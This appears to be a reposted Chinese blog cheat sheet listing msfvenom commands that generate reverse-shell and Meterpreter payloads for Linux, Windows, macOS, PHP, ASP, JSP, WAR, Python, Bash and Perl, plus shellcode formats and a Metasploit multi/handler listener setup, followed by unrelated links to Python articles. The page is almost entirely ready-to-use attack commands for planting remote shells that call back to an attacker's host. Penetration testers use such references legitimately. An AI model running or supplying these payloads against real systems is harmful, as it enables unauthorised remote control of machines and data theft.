博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
msfvenom生成各种Payload命令
阅读量:3905 次
发布时间:2019-05-23

本文共 1487 字,大约阅读时间需要 4 分钟。

msfvenom生成各种Payload命令


  1. 在这里插入图片描述
msfvenom -l        列出所有模块,攻击载荷Binarieslinuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=
LPORT=
-f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT=
-f exe > shell.exeMacmsfvenom -p osx/x86ell_reverse_tcp LHOST=
LPORT=
-f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=
LPORT=
-f raw > shell.phpcat shell.php | pbcopy && echo '
shell.php && pbpaste >> shell.php ASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT=
-f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=
LPORT=
-f raw > shell.jsp WARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=
LPORT=
-f war > shell.warScripting Payloads Pythonmsfvenom -p cmd/unix/reverse_python LHOST=
LPORT=
-f raw > shell.py Bashmsfvenom -p cmd/unix/reverse_bash LHOST=
LPORT=
-f raw > shell.sh Perlmsfvenom -p cmd/unix/reverse_perl LHOST=
LPORT=
-f raw > shell.plShellcodeFor all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.Linux Based Shellcodemsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=
LPORT=
-f
Windows Based Shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT=
-f
Mac Based Shellcodemsfvenom -p osx/x86/shell_reverse_tcp LHOST=
LPORT=
-f
Handleruse exploit/multi/handler set PAYLOAD
set LHOST
set LPORT
exploit

转载地址:http://dmmen.baihongyu.com/

你可能感兴趣的文章
Python hashmap
查看>>
python 切片
查看>>
interview sum
查看>>
HTTPs Control
查看>>
澳洲孕维生素
查看>>
Prenatal Vitamin Brands
查看>>
has_key or in
查看>>
Python sort list customisation
查看>>
Python sort dict by value
查看>>
Python collections deque - double-ended queue ()
查看>>
Python sort sorted OrderDict
查看>>
Python dict sort
查看>>
Python lambda
查看>>
Python modify string in place
查看>>
Python dict del
查看>>
Http header
查看>>
HTTP Header
查看>>
ASCII - American Standard Code for Information Interchange
查看>>
进制转换
查看>>
Python L suffix - indicated long integer literals before Python3
查看>>